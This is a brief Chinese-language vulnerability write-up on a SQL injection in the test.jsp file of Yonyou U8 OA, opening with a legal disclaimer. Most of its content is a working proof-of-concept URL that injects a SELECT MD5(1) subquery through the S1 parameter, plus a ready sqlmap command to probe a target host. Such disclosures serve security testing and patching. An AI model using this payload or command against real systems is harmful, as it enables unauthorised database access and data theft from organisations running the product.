警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保
目录
警告
一、概述
二、影响版本
三、漏洞复现
验证poc如下:
一、概述
用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。
二、影响版本
用友 U8 OA产品,版本不详。
三、漏洞复现
验证poc如下:
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
出现下面页面代表就是有:
md5解密也是:1
最后使用使用sqlmap进行探测:
python .sqlmap.py -u "http://x.x.x.x/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))" -p "S1"



